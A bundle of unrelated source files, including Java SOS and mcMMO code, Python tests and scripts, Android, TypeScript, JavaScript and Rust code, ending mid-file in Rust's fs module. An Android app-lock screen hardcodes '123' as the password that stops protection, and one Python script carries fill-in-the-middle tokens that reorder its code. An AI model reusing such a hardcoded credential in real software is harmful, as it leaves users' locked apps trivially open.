// File: ServiceOperatorRepository.java
/**
* Copyright (C) 2012-2016 52°North Initiative for Geospatial Open Source
* Software GmbH
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation.
*
* If the program is linked with libraries which are licensed under one of
* the following licenses, the combination of the program with the linked
* library is not considered a "derivative work" of the program:
*
* - Apache License, version 2.0
* - Apache Software License, version 1.0
* - GNU Lesser General Public License, version 3
* - Mozilla Public License, versions 1.0, 1.1 and 2.0
* - Common Development and Distribution License (CDDL), version 1.0
*
* Therefore the distribution of the program linked with libraries licensed
* under the aforementioned licenses, is permitted by the copyright holders
* if the distribution is compliant with both the GNU General Public
* License version 2 and the aforementioned licenses.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
* Public License for more details.
*/
package org.n52.sos.service.operator;
import java.util.Collections;
import java.util.Map;
import java.util.Set;
import org.n52.sos.exception.ConfigurationException;
import org.n52.sos.ogc.ows.OwsExceptionReport;
import org.n52.sos.request.operator.RequestOperatorRepository;
import org.n52.sos.util.AbstractConfiguringServiceLoaderRepository;
import org.n52.sos.util.CollectionHelper;
import org.n52.sos.util.MultiMaps;
import org.n52.sos.util.SetMultiMap;
import com.google.common.collect.Maps;
import com.google.common.collect.Sets;
/**
* @author Christian Autermann <[email protected]>
*
* @since 4.0.0
*/
public class ServiceOperatorRepository extends AbstractConfiguringServiceLoaderRepository<ServiceOperator> {
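    // Initialization-on-demand holder idiom: the JVM initializes LazyHolder
    // (and thus INSTANCE) only on the first getInstance() call, giving a
    // lazily constructed, thread-safe singleton without explicit locking.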
private static class LazyHolder {
private static final ServiceOperatorRepository INSTANCE = new ServiceOperatorRepository();
        private LazyHolder() {}
}
/**
* Implemented ServiceOperator
*/
private final Map<ServiceOperatorKey, ServiceOperator> serviceOperators = Maps.newHashMap();
/** supported SOS versions */
private final SetMultiMap<String, String> supportedVersions = MultiMaps.newSetMultiMap();
/** supported services */
private final Set<String> supportedServices = Sets.newHashSet();
/**
* Load implemented request listener
*
* @throws ConfigurationException
* If no request listener is implemented
*/
private ServiceOperatorRepository() throws ConfigurationException {
super(ServiceOperator.class, false);
load(false);
}
public static ServiceOperatorRepository getInstance() {
return LazyHolder.INSTANCE;
}
/**
 * Load the implemented service operators and add them to a map with the
 * {@link ServiceOperatorKey} as key
*
* @param implementations
* the loaded implementations
*
* @throws ConfigurationException
* If no request listener is implemented
*/
@Override
protected void processConfiguredImplementations(final Set<ServiceOperator> implementations)
throws ConfigurationException {
serviceOperators.clear();
supportedServices.clear();
supportedVersions.clear();
for (final ServiceOperator so : implementations) {
serviceOperators.put(so.getServiceOperatorKey(), so);
supportedVersions.add(so.getServiceOperatorKey().getService(), so.getServiceOperatorKey()
.getVersion());
supportedServices.add(so.getServiceOperatorKey().getService());
}
}
/**
* Update/reload the implemented request listener
*
* @throws ConfigurationException
* If no request listener is implemented
*/
@Override
public void update() throws ConfigurationException {
RequestOperatorRepository.getInstance().update();
super.update();
}
/**
 * @return the implemented service operators
*/
public Map<ServiceOperatorKey, ServiceOperator> getServiceOperators() {
return Collections.unmodifiableMap(serviceOperators);
}
public Set<ServiceOperatorKey> getServiceOperatorKeyTypes() {
return getServiceOperators().keySet();
}
public ServiceOperator getServiceOperator(final ServiceOperatorKey sok) {
return serviceOperators.get(sok);
}
/**
 * @param service
* the service
* @param version
* the version
 * @return the matching service operator
 *
* @throws OwsExceptionReport
*/
public ServiceOperator getServiceOperator(final String service, final String version) throws OwsExceptionReport {
return getServiceOperator(new ServiceOperatorKey(service, version));
}
/**
 * @return all supported versions
 *
 * @deprecated use getSupportedVersions(String service)
*/
@Deprecated
public Set<String> getSupportedVersions() {
return getAllSupportedVersions();
}
public Set<String> getAllSupportedVersions() {
return CollectionHelper.union(supportedVersions.values());
}
/**
* @param service
* the service
* @return the supportedVersions
*
*/
public Set<String> getSupportedVersions(final String service) {
if (isServiceSupported(service)) {
return Collections.unmodifiableSet(supportedVersions.get(service));
}
return Sets.newHashSet();
}
/**
* @param version
* the version
 * @return whether any service supports the given version
*
* @deprecated use isVersionSupported(String service, String version)
*/
@Deprecated
public boolean isVersionSupported(final String version) {
return getAllSupportedVersions().contains(version);
}
/**
* @param service
* the service
* @param version
* the version
 * @return whether the given version of the service is supported
*
*/
public boolean isVersionSupported(final String service, final String version) {
return isServiceSupported(service) && supportedVersions.get(service).contains(version);
}
/**
 * @return the supported services
*/
public Set<String> getSupportedServices() {
return Collections.unmodifiableSet(supportedServices);
}
public boolean isServiceSupported(final String service) {
return supportedServices.contains(service);
}
}
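// A minimal usage sketch (hypothetical service/version strings; real values
// depend on the deployment). getServiceOperator(String, String) declares
// OwsExceptionReport:
//
//   ServiceOperatorRepository repo = ServiceOperatorRepository.getInstance();
//   if (repo.isVersionSupported("SOS", "2.0.0")) {
//       ServiceOperator so = repo.getServiceOperator("SOS", "2.0.0");
//   }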
# File: test_set_start_page01.py
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013, John McNamara, [email protected]
#
import unittest
import os
from ...workbook import Workbook
from ..helperfunctions import _compare_xlsx_files
class TestCompareXLSXFiles(unittest.TestCase):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'set_start_page01.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
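        # Binary printer settings and printer-dependent page margins vary by
        # machine, so they are excluded from the byte-for-byte comparison below.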
self.ignore_files = ['xl/printerSettings/printerSettings1.bin',
'xl/worksheets/_rels/sheet1.xml.rels']
self.ignore_elements = {'[Content_Types].xml': ['<Default Extension="bin"'],
'xl/worksheets/sheet1.xml': ['<pageMargins']}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with printer settings."""
filename = self.got_filename
####################################################
workbook = Workbook(filename)
worksheet = workbook.add_worksheet()
worksheet.set_start_page(1)
worksheet.set_paper(9)
worksheet.write('A1', 'Foo')
workbook.close()
####################################################
got, exp = _compare_xlsx_files(self.got_filename,
self.exp_filename,
self.ignore_files,
self.ignore_elements)
self.assertEqual(got, exp)
def tearDown(self):
# Cleanup.
if os.path.exists(self.got_filename):
os.remove(self.got_filename)
if __name__ == '__main__':
    unittest.main()
# File: slope.py
#!/Library/Frameworks/Python.framework/Versions/2.7/bin/python
import numpy as np
import sys
import scipy
from scipy import stats
data_file = sys.argv[1]
data = np.loadtxt(data_file)
slope, intercept, r_value, p_value, std_err = stats.linregress(data[499:2499,0], data[499:2499,1])
nf = open('linear_reg.dat', 'w')
nf.write("Linear Regression for data between %5d ps (frame: 499) and %5d ps (frame 2499) \n" %(data[499][0], data[2499][0]))
nf.write("slope: %10.5E Angstrom^2 ps^-1 \n" %(slope))
nf.write("intercept: %10.5E Angstrom^2\n" %(intercept))
nf.write("R^2: %10.5f \n" %(r_value**2))
nf.write('Diffusion coeff: %10.5E Angstrom^2 ps^-1 \n' %(slope/6.0))
nf.write('Diffusion coeff: %10.5E m^2 s^-1 \n' %(slope*10**(-8)/6.0))
nf.close()
// File: EnterPwdActivity.java
package mobilesafe.dda.com.activity;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.text.InputType;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
import android.widget.EditText;
import com.dda.mobilesafe.utils.UIUtils;
/**
 * Created by nuo on 2016/6/28 at 11:27.
 * Description: the password-entry screen.
*/
public class EnterPwdActivity extends Activity implements OnClickListener {
private EditText et_pwd;
private Button bt_0;
private Button bt_1;
private Button bt_2;
private Button bt_3;
private Button bt_4;
private Button bt_5;
private Button bt_6;
private Button bt_7;
private Button bt_8;
private Button bt_9;
private Button bt_clean_all;
private Button bt_delete;
private Button bt_ok;
private String packageName;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_set_pwd);
initUI();
}
private void initUI() {
Intent intent = getIntent();
if (intent != null) {
packageName = intent.getStringExtra("packageName");
}
et_pwd = (EditText) findViewById(R.id.et_pwd);
bt_0 = (Button) findViewById(R.id.bt_0);
bt_1 = (Button) findViewById(R.id.bt_1);
bt_2 = (Button) findViewById(R.id.bt_2);
bt_3 = (Button) findViewById(R.id.bt_3);
bt_4 = (Button) findViewById(R.id.bt_4);
bt_5 = (Button) findViewById(R.id.bt_5);
bt_6 = (Button) findViewById(R.id.bt_6);
bt_7 = (Button) findViewById(R.id.bt_7);
bt_8 = (Button) findViewById(R.id.bt_8);
bt_9 = (Button) findViewById(R.id.bt_9);
bt_ok = (Button) findViewById(R.id.bt_ok);
bt_ok.setOnClickListener(this);
bt_clean_all = (Button) findViewById(R.id.bt_clean_all);
bt_delete = (Button) findViewById(R.id.bt_delete);
        // Hide the soft keyboard for this input field
et_pwd.setInputType(InputType.TYPE_NULL);
        // Clear the whole input
bt_clean_all.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
et_pwd.setText("");
}
});
        // Delete the last character
bt_delete.setOnClickListener(new OnClickListener() {
private String str;
@Override
public void onClick(View v) {
str = et_pwd.getText().toString();
if (str.length() == 0) {
return;
}
et_pwd.setText(str.substring(0, str.length() - 1));
}
});
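        // Each digit button below appends its own label to the password
        // field; the ten listeners are identical apart from the button used.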
bt_0.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_0.getText().toString());
}
});
bt_1.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_1.getText().toString());
}
});
bt_2.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_2.getText().toString());
}
});
bt_3.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_3.getText().toString());
}
});
bt_4.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_4.getText().toString());
}
});
bt_5.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_5.getText().toString());
}
});
bt_6.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_6.getText().toString());
}
});
bt_7.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_7.getText().toString());
}
});
bt_8.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_8.getText().toString());
}
});
bt_9.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
String str = et_pwd.getText().toString();
et_pwd.setText(str + bt_9.getText().toString());
}
});
}
@Override
public void onClick(View v) {
switch (v.getId()) {
case R.id.bt_ok:
String result = et_pwd.getText().toString();
if ("123".equals(result)) {
                    // Correct password: this is the trusted owner, so do not intercept.
                    //System.out.println("password entered correctly");
Intent intent = new Intent();
                    // Send a broadcast to stop protection
intent.setAction("com.dda.mobilesafe.stopprotect");
                    // Tell the watchdog service to stop protecting this package now
intent.putExtra("packageName", packageName);
sendBroadcast(intent);
finish();
} else {
UIUtils.showToast(EnterPwdActivity.this, "密码错误");
}
break;
}
}
@Override
public void onBackPressed() {
        // When the user presses the back key, go to the home screen instead
Intent intent = new Intent();
intent.setAction("android.intent.action.MAIN");
intent.addCategory("android.intent.category.HOME");
intent.addCategory("android.intent.category.DEFAULT");
intent.addCategory("android.intent.category.MONKEY");
startActivity(intent);
}
}
# File: evmctl-tests.py
#!/usr/bin/env python
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# See LICENSE for more details.
#
# Copyright: 2021 IBM
# Author: Nageswara R Sastry <[email protected]>
import os
from avocado import Test
from avocado.utils import archive, process
from avocado.utils.software_manager import SoftwareManager
class EvmCtl(Test):
"""
evmctl-testsuite
:avocado: tags=security,testsuite
"""
def setUp(self):
'''
Install the basic packages to support evmctl
'''
# Check for basic utilities
smm = SoftwareManager()
deps = ['gcc', 'make']
for package in deps:
if not smm.check_installed(package) and not smm.install(package):
self.cancel('%s is needed for the test to be run' % package)
url = "https://sourceforge.net/projects/linux-ima/files/latest/download"
tarball = self.fetch_asset(name="download.tar.gz", locations=url, expire='7d')
archive.extract(tarball, self.workdir)
self.sourcedir = os.path.join(self.workdir, os.listdir(self.workdir)[0])
self.log.info("sourcedir - %s" % self.sourcedir)
os.chdir(self.sourcedir)
process.run('./autogen.sh', ignore_status=True)
def test(self):
'''
Running tests from evmctl
'''
count = 0
output = process.system_output('./build.sh', ignore_status=True).decode()
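        # Scan the build.sh output from the end for the "# FAIL" summary line
        # and extract the failure count from it.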
for line in reversed(output.splitlines()):
if '# FAIL' in line:
count = int(line.split(":")[1].strip())
self.log.info(line)
break
# If the fail count is more than 0 then there are some failed tests
if count:
            self.fail("%s test(s) failed, please refer to the log" % count)
// File: settings.tsx
import Form from './reuse/form';
import Input from './reuse/input';
import { BreadCrumb } from './reuse/breadcrumb';
import { GET_SETTINGS, GfycatClientSettingsFromRender, SETTINGS_CHANGED, RETURN_SETTINGS } from '../settingsHandler';
import * as React from 'react';
import { ipcRenderer } from 'electron';
export default class Settings extends React.Component<any, GfycatClientSettingsFromRender> {
_defaultSettings: GfycatClientSettingsFromRender = {userName: '', apiId: '', password: '', apiSecret: '', paths: []};
constructor(props: any) {
super(props);
this.state = this._defaultSettings;
ipcRenderer.on(RETURN_SETTINGS, (event: any, args: GfycatClientSettingsFromRender) => {
this.updateState(args);
});
}
render() {
return (
<div className='container'>
<h2>Settings</h2>
<Form userName={this.state.userName} paths={this.state.paths} apiId={this.state.apiId} password={this.state.password}
apiSecret={this.state.apiSecret} handleSubmit={this.handleSubmit.bind(this)} />
</div>
);
}
componentDidMount() {
this.getSavedSettings();
}
handleSubmit(event: GfycatClientSettingsFromRender) {
//history.pushState('/', 'Home');
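        // Merge the submitted settings into local state, but keep the current
        // in-memory password and apiSecret rather than the values on the event.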
        ipcRenderer.send(SETTINGS_CHANGED, event);
        this.updateState({...event, password: this.state.password, apiSecret: this.state.apiSecret});
    }
getSavedSettings() {
ipcRenderer.send(GET_SETTINGS);
}
updateState(value: GfycatClientSettingsFromRender) {
this.setState((prev) => {
let newState = {...prev, ...value};
newState = {...newState, paths: [...value.paths]};
return newState;
});
}
}
# File: check_duplicate_key.py
from __future__ import print_function
import six.moves.cPickle as pickle
import os
import sys
import theano
from six import iteritems, itervalues
DISPLAY_DUPLICATE_KEYS = False
DISPLAY_MOST_FREQUENT_DUPLICATE_CCODE = False
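# Walk the Theano compilation cache (compiledir) and count how many cache
# entries share the same key.pkl contents or the same generated mod.{cpp,cu}
# source; duplicates point at redundant compilation work.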
dirs = []
if len(sys.argv) > 1:
for compiledir in sys.argv[1:]:
dirs.extend([os.path.join(compiledir, d) for d in os.listdir(compiledir)])
else:
dirs = os.listdir(theano.config.compiledir)
dirs = [os.path.join(theano.config.compiledir, d) for d in dirs]
keys = {} # key -> nb seen
mods = {}
for dir in dirs:
key = None
try:
f = open(os.path.join(dir, "key.pkl"))
key = f.read()
f.close()
keys.setdefault(key, 0)
keys[key] += 1
del f
except IOError:
# print dir, "don't have a key.pkl file"
pass
try:
path = os.path.join(dir, "mod.cpp")
if not os.path.exists(path):
path = os.path.join(dir, "mod.cu")<|fim▁hole|> mods[mod] += (key,)
del mod
del f
del path
except IOError:
print(dir, "don't have a mod.{cpp,cu} file")
pass
if DISPLAY_DUPLICATE_KEYS:
for k, v in iteritems(keys):
if v > 1:
print("Duplicate key (%i copies): %s" % (v, pickle.loads(k)))
nbs_keys = {}  # nb seen -> how many keys
for val in itervalues(keys):
nbs_keys.setdefault(val, 0)
nbs_keys[val] += 1
nbs_mod = {}  # nb seen -> how many mods
nbs_mod_to_key = {} # nb seen -> keys
more_than_one = 0
for mod, kk in iteritems(mods):
val = len(kk)
nbs_mod.setdefault(val, 0)
nbs_mod[val] += 1
if val > 1:
more_than_one += 1
nbs_mod_to_key[val] = kk
if DISPLAY_MOST_FREQUENT_DUPLICATE_CCODE:
m = max(nbs_mod.keys())
print("The keys associated to the mod.{cpp,cu} with the most number of copy:")
for kk in nbs_mod_to_key[m]:
kk = pickle.loads(kk)
print(kk)
print("key.pkl histograph")
l = list(nbs_keys.items())
l.sort()
print(l)
print("mod.{cpp,cu} histogram")
l = list(nbs_mod.items())
l.sort()
print(l)
total = sum(len(k) for k in list(mods.values()))
uniq = len(mods)
useless = total - uniq
print("mod.{cpp,cu} total:", total)
print("mod.{cpp,cu} uniq:", uniq)
print("mod.{cpp,cu} with more than 1 copy:", more_than_one)
print("mod.{cpp,cu} useless:", useless, float(useless) / total * 100, "%")
print("nb directory", len(dirs))<|fim▁end|> | f = open(path)
mod = f.read()
f.close()
mods.setdefault(mod, ()) |
// File: PCommand.java
package com.gmail.nossr50.commands.party;
import org.bukkit.ChatColor;
import org.bukkit.command.Command;
import org.bukkit.command.CommandExecutor;
import org.bukkit.command.CommandSender;
import org.bukkit.entity.Player;
import com.gmail.nossr50.mcMMO;
import com.gmail.nossr50.commands.CommandHelper;
import com.gmail.nossr50.datatypes.PlayerProfile;
import com.gmail.nossr50.events.chat.McMMOPartyChatEvent;
import com.gmail.nossr50.locale.LocaleLoader;
import com.gmail.nossr50.party.Party;
import com.gmail.nossr50.party.PartyManager;
import com.gmail.nossr50.util.Users;
public class PCommand implements CommandExecutor {
private final mcMMO plugin;
public PCommand (mcMMO plugin) {
this.plugin = plugin;
}
@Override
public boolean onCommand(CommandSender sender, Command command, String label, String[] args) {
PlayerProfile profile;
String usage = ChatColor.RED + "Proper usage is /p <party-name> <message>"; //TODO: Needs more locale.
if (CommandHelper.noCommandPermissions(sender, "mcmmo.commands.party")) {
return true;
}
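        // No arguments: toggle party chat mode for the sender. With arguments,
        // join them into a single message and send it to the party.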
switch (args.length) {
case 0:
if (sender instanceof Player) {
profile = Users.getProfile((Player) sender);
if (profile.getAdminChatMode()) {
profile.toggleAdminChat();
}
profile.togglePartyChat();
if (profile.getPartyChatMode()) {
sender.sendMessage(LocaleLoader.getString("Commands.Party.Chat.On"));
}
else {
sender.sendMessage(LocaleLoader.getString("Commands.Party.Chat.Off"));
}
}
else {
sender.sendMessage(usage);
}
return true;
default:
if (sender instanceof Player) {
Player player = (Player) sender;
Party party = Users.getProfile(player).getParty();
if (party == null) {
player.sendMessage(LocaleLoader.getString("Commands.Party.None"));
return true;
}
StringBuffer buffer = new StringBuffer();
buffer.append(args[0]);
for (int i = 1; i < args.length; i++) {
buffer.append(" ");
buffer.append(args[i]);
}
String message = buffer.toString();
McMMOPartyChatEvent chatEvent = new McMMOPartyChatEvent(player.getName(), party.getName(), message);
plugin.getServer().getPluginManager().callEvent(chatEvent);
if (chatEvent.isCancelled()) {
return true;
}
message = chatEvent.getMessage();
String prefix = ChatColor.GREEN + "(" + ChatColor.WHITE + player.getName() + ChatColor.GREEN + ") ";
plugin.getLogger().info("[P](" + party.getName() + ")" + "<" + player.getName() + "> " + message);
for (Player member : party.getOnlineMembers()) {
member.sendMessage(prefix + message);
}
}
else {
if (args.length < 2) {
sender.sendMessage(usage);
return true;
}
if (!PartyManager.getInstance().isParty(args[0])) {
sender.sendMessage(LocaleLoader.getString("Party.InvalidName"));
return true;
}
StringBuffer buffer = new StringBuffer();
buffer.append(args[1]);
for (int i = 2; i < args.length; i++) {
buffer.append(" ");
buffer.append(args[i]);
}
String message = buffer.toString();
McMMOPartyChatEvent chatEvent = new McMMOPartyChatEvent("Console", args[0], message);
plugin.getServer().getPluginManager().callEvent(chatEvent);
if (chatEvent.isCancelled()) {
return true;
}
message = chatEvent.getMessage();
String prefix = ChatColor.GREEN + "(" + ChatColor.WHITE + "*Console*" + ChatColor.GREEN + ") ";
plugin.getLogger().info("[P](" + args[0] + ")" + "<*Console*> " + message);
for (Player member : PartyManager.getInstance().getOnlineMembers(args[0])) {
member.sendMessage(prefix + message);
}
}
return true;
}
}
}
// File: DemoBase.java
package com.xsing.demo;
import android.graphics.Typeface;
import android.os.Bundle;
import android.support.annotation.Nullable;
import android.support.v4.app.FragmentActivity;
/**
 * Base class of all activities of the demo application.
*
* @author Philipp Jahoda
*/
public abstract class DemoBase extends FragmentActivity {
protected String[] mMonths = new String[] {
"Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Okt", "Nov", "Dec"
};
protected String[] mParties = new String[] {
"Party A", "Party B", "Party C", "Party D", "Party E", "Party F", "Party G", "Party H",
"Party I", "Party J", "Party K", "Party L", "Party M", "Party N", "Party O", "Party P",
"Party Q", "Party R", "Party S", "Party T", "Party U", "Party V", "Party W", "Party X",
"Party Y", "Party Z"
};
@Override
protected void onCreate(@Nullable Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
}
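    /** Returns a random float in the half-open range [startsfrom, startsfrom + range). */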
protected float getRandom(float range, float startsfrom) {
return (float) (Math.random() * range) + startsfrom;
}
@Override
public void onBackPressed() {
super.onBackPressed();
// overridePendingTransition(R.anim.move_left_in_activity, R.anim.move_right_out_activity);
}
}
// File: example.rs
use std::iter::FromIterator;
pub struct SimpleLinkedList<T> {
head: Option<Box<Node<T>>>,
len: usize,
}
struct Node<T> {
data: T,
next: Option<Box<Node<T>>>,
}
impl<T> SimpleLinkedList<T> {
pub fn new() -> Self {
SimpleLinkedList { head: None, len: 0 }
}
pub fn is_empty(&self) -> bool {
        self.len == 0
    }
pub fn len(&self) -> usize {
self.len
}
pub fn push(&mut self, element: T) {
let node = Box::new(Node::new(element, self.head.take()));
self.head = Some(node);
self.len += 1;
}
pub fn pop(&mut self) -> Option<T> {
match self.len {
0 => None,
_ => {
self.len -= 1;
self.head.take().map(|node| {
let node = *node;
self.head = node.next;
node.data
})
}
}
}
pub fn peek(&self) -> Option<&T> {
self.head.as_ref().map(|node| &node.data)
}
pub fn rev(self) -> SimpleLinkedList<T> {
let mut rev_list = SimpleLinkedList::new();
let mut vec: Vec<_> = self.into();
for t in vec.drain(..).rev() {
rev_list.push(t);
}
rev_list
}
}
impl<T> FromIterator<T> for SimpleLinkedList<T> {
fn from_iter<I: IntoIterator<Item = T>>(iter: I) -> Self {
let mut sll = SimpleLinkedList::new();
for t in iter {
sll.push(t);
}
sll
}
}
impl<T> From<SimpleLinkedList<T>> for Vec<T> {
fn from(mut linked_list: SimpleLinkedList<T>) -> Vec<T> {
let mut vec: Vec<T> = Vec::with_capacity(linked_list.len());
while let Some(data) = linked_list.pop() {
vec.push(data);
}
vec.reverse();
vec
}
}
impl<T> Node<T> {
pub fn new(element: T, next: Option<Box<Node<T>>>) -> Self {
Node {
data: element,
next,
}
}
}
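// A minimal usage sketch of the list as a LIFO stack (test-style; not part of
// the original exercise solution):
#[cfg(test)]
mod usage_sketch {
    use super::SimpleLinkedList;

    #[test]
    fn push_pop_peek() {
        let mut list = SimpleLinkedList::new();
        assert!(list.is_empty());
        list.push(1);
        list.push(2);
        // The most recently pushed element is on top.
        assert_eq!(list.peek(), Some(&2));
        assert_eq!(list.pop(), Some(2));
        assert_eq!(list.len(), 1);
    }
}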
// File: regex.js
/**
* Regex patterns used through keigai
*
* `url` was authored by Diego Perini
*
* @namespace regex
 * @private
 * @type {Object}
 */
let regex = {
after_space: /\s+.*/,
allow: /^allow$/i,
allow_cors: /^access-control-allow-methods$/i,
and: /^&/,
args: /\((.*)\)/,
auth: /\/\/(.*)\@/,
bool: /^(true|false)?$/,
boolean_number_string: /boolean|number|string/,
caps: /[A-Z]/,
cdata: /\&|<|>|\"|\'|\t|\r|\n|\@|\$/,
checked_disabled: /checked|disabled/i,
complete_loaded: /^(complete|loaded)$/i,
csv_quote: /^\s|\"|\n|,|\s$/,
del: /^del/,
domain: /^[\w.-_]+\.[A-Za-z]{2,}$/,
down: /down/,
endslash: /\/$/,
eol_nl: /\n$/,
element_update: /id|innerHTML|innerText|textContent|type|src/,
get_headers: /^(head|get|options)$/,
get_remove_set: /get|remove|set/,
hash: /^\#/,
header_replace: /:.*/,
header_value_replace: /.*:\s+/,
html: /^<.*>$/,
http_body: /200|201|202|203|206/,
http_ports: /80|443/,
host: /\/\/(.*)\//,
ie: /msie|ie|\.net|windows\snt/i,
ip: /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/,
is_xml: /^<\?xml.*\?>/,
json_maybe: /json|plain|javascript/,
json_wrap: /^[\[\{]/,
klass: /^\./,
no: /no-store|no-cache/i,
not_dotnotation: /-|\s/,
not_endpoint: /.*\//,
null_undefined: /null|undefined/,
number: /(^-?\d\d*\.\d*$)|(^-?\d\d*$)|(^-?\.\d\d*$)|number/,
number_format_1: /.*\./,
number_format_2: /\..*/,
number_present: /\d{1,}/,
number_string: /number|string/i,
number_string_object: /number|object|string/i,
object_type: /\[object Object\]/,
patch: /^patch$/,
primitive: /^(boolean|function|number|string)$/,
priv: /private/,
protocol: /^(.*)\/\//,
put_post: /^(post|put)$/i,
question: /(\?{1,})/,
radio_checkbox: /^(radio|checkbox)$/i,
root: /^\/[^\/]/,
select: /select/i,
selector_is: /^:/,
selector_complex: /\s+|\>|\+|\~|\:|\[/,
set_del: /^(set|del|delete)$/,
space_hyphen: /\s|-/,
string_object: /string|object/i,
svg: /svg/,
top_bottom: /top|bottom/i,
trick: /(\%3F{1,})/,
url: /^(?:(?:https?|ftp):\/\/)(?:\S+(?::\S*)?@)?(?:(?!10(?:\.\d{1,3}){3})(?!127(?:\.\d{1,3}){3})(?!169\.254(?:\.\d{1,3}){2})(?!192\.168(?:\.\d{1,3}){2})(?!172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))|(?:(?:[a-z\u00a1-\uffff0-9]+-?)*[a-z\u00a1-\uffff0-9]+)(?:\.(?:[a-z\u00a1-\uffff0-9]+-?)*[a-z\u00a1-\uffff0-9]+)*(?:\.(?:[a-z\u00a1-\uffff]{2,})))(?::\d{2,5})?(?:\/[^\s]*)?$/i,
word: /^\w+$/,
xdomainrequest: /^(get|post)$/i,
xml: /xml/i
};
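// e.g. regex.ip.test("10.0.0.1") === true; regex.bool.test("maybe") === false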
// File: fs.rs
// Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Filesystem manipulation operations
//!
//! This module contains basic methods to manipulate the contents of the local
//! filesystem. All methods in this module represent cross-platform filesystem
//! operations. Extra platform-specific functionality can be found in the
//! extension traits of `std::os::$platform`.
#![stable(feature = "rust1", since = "1.0.0")]
use core::prelude::*;
use fmt;
use ffi::OsString;
use io::{self, Error, ErrorKind, SeekFrom, Seek, Read, Write};
use path::{Path, PathBuf};
use sys::fs as fs_imp;
use sys_common::{AsInnerMut, FromInner, AsInner};
use vec::Vec;
/// A reference to an open file on the filesystem.
///
/// An instance of a `File` can be read and/or written depending on what options
/// it was opened with. Files also implement `Seek` to alter the logical cursor
/// that the file contains internally.
///
/// # Examples
///
/// ```no_run
/// use std::io::prelude::*;
/// use std::fs::File;
///
/// # fn foo() -> std::io::Result<()> {
/// let mut f = try!(File::create("foo.txt"));
/// try!(f.write_all(b"Hello, world!"));
///
/// let mut f = try!(File::open("foo.txt"));
/// let mut s = String::new();
/// try!(f.read_to_string(&mut s));
/// assert_eq!(s, "Hello, world!");
/// # Ok(())
/// # }
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub struct File {
inner: fs_imp::File,
}
/// Metadata information about a file.
///
/// This structure is returned from the `metadata` function or method and
/// represents known metadata about a file such as its permissions, size,
/// modification times, etc.
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Metadata(fs_imp::FileAttr);
/// Iterator over the entries in a directory.
///
/// This iterator is returned from the `read_dir` function of this module and
/// will yield instances of `io::Result<DirEntry>`. Through a `DirEntry`
/// information like the entry's path and possibly other metadata can be
/// learned.
///
/// # Failure
///
/// This `io::Result` will be an `Err` if there's some sort of intermittent
/// IO error during iteration.
#[stable(feature = "rust1", since = "1.0.0")]
pub struct ReadDir(fs_imp::ReadDir);
/// Entries returned by the `ReadDir` iterator.
///
/// An instance of `DirEntry` represents an entry inside of a directory on the
/// filesystem. Each entry can be inspected via methods to learn about the full
/// path or possibly other metadata through per-platform extension traits.
#[stable(feature = "rust1", since = "1.0.0")]
pub struct DirEntry(fs_imp::DirEntry);
/// An iterator that recursively walks over the contents of a directory.
#[unstable(feature = "fs_walk",
reason = "the precise semantics and defaults for a recursive walk \
may change and this may end up accounting for files such \
as symlinks differently")]
pub struct WalkDir {
cur: Option<ReadDir>,
stack: Vec<io::Result<ReadDir>>,
}
/// Options and flags which can be used to configure how a file is opened.
///
